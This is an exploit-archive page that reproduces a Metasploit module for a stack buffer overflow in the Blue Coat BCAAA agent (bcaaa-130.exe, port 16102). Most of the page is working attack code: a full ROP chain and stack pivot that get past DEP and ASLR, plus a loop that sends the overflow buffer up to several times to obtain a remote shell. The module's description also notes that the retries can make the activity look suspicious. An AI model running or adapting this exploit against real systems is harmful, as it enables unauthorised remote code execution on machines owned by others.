what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow

Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
Posted Jul 9, 2011
Authored by Travis Warren, sinn3r, Paul Harrington | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102), which comes as part of the Blue Coat Authentication proxy. Please note that by default, this exploit will attempt up to three times in order to successfully gain remote code execution (in some cases, it takes as many as five times). This can cause your activity to look even more suspicious. To modify the number of exploit attempts, set the ATTEMPTS option.

tags | exploit, remote, overflow, code execution
SHA-256 | ba8634a1f89adc72bb1fa6c7125d662b2e0d1e9a7d1b79249e69e1b06460f06e

Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow

Change Mirror Download
##
# $Id: bcaaa_bof.rb 13137 2011-07-09 04:10:52Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Tcp

def initialize(info={})
super(update_info(info,
'Name' => "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",
'Description' => %q{
This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),
which comes as part of the Blue Coat Authentication proxy. Please note that by default,
this exploit will attempt up to three times in order to successfully gain remote code
execution (in some cases, it takes as many as five times). This can cause your activity
to look even more suspicious. To modify the number of exploit attempts, set the
ATTEMPTS option.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 13137 $",
'Author' =>
[
'Paul Harrington', # Initial discovery and PoC
'Travis Warren', # MSF Module with Universal DEP/ASLR bypass
'sinn3r', # More testing / reliability, plus minor changes
],
'References' =>
[
[ 'URL', 'https://kb.bluecoat.com/index?page=content&id=SA55' ],
[ 'URL', 'http://seclists.org/bugtraq/2011/Jul/44' ],
],
'Payload' =>
{
'Space' => 936,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'BCAAA Version 5.4.6.1.54128', {} ],
],
'Privileged' => false,
'DisclosureDate' => "Apr 4 2011",
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(16102),
OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]),
], self.class)
end

def junk
return rand_text(4).unpack("L")[0].to_i
end

def exploit

rop_gadgets = [
# rop chain generated with mona.py
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # Make EAX readable
0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
junk, # EBP (filler)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # <- *&VirtualProtect()
0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
0x7c346c0b, # Slide, so next gadget would write to correct stack location
0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
junk, # EDI (filler)
junk, # will be patched at runtime (VP), then picked up into ESI
junk, # EBX (filler)
0x7c376402, # POP EBP # RETN (msvcr71.dll)
0x7c345c30, # ptr to 'push esp # ret ' (from MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0xfffffdff, # size 0x00000201 -> ebx, modify if needed
0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
0x7c354901, # POP EBX # RETN (MSVCR71.dll)
0xffffffff, # pop value into ebx
0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
0x7c34b8d8, # ROP NOP (-> edi)
0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
0xffffffc0, # value to negate, target value : 0x00000040, target: edx
0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x90909090, # NOPS (-> eax)
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
].pack("V*")

pivot = [
0x7C3410C4, # RETN (MSVCR71.dll)
0x1003800C, # PUSH ESP; POP EBX; POP EBP; RETN (SmAgentAPI.dll)
0x4241467D, # EBP
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
0x7C3417D2, # SUB EAX,EAX; RETN (MSVCR71.dll)
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
0x7C34f6C2, # MOV EAX, EBX; POP EBX; RETN (MSVCR71.dll)
junk, # EBX
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
0x5D02D0A0, # SUB EBP,EAX; RETN (MSVCR70.dll)
0x7C3C8937, # XCHG EAX,EBP; RETN (MSVCP71.dll)
0x7C3B5080, # XCHG EAX,ESP; RETN (MSVCP71.dll)
].pack("V*")

attempts = datastore['ATTEMPTS']

#Sometimes a few attempts are needed to get a shell back (3 or 5 times)
attempts.times do |i|
#If we have a session on the box already, then we don't continue trying
break if session_created?
buffer = rand_text(8)
buffer << rop_gadgets
buffer << payload.encoded
buffer << 'EBAB'
buffer << rand_text(8)
buffer << pivot

connect
print_status("Sending request to #{rhost}. Attempt ##{(i+1).to_s}...")
sock.put(buffer)
handler
select(nil, nil, nil, 2)
disconnect
end
end
end
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close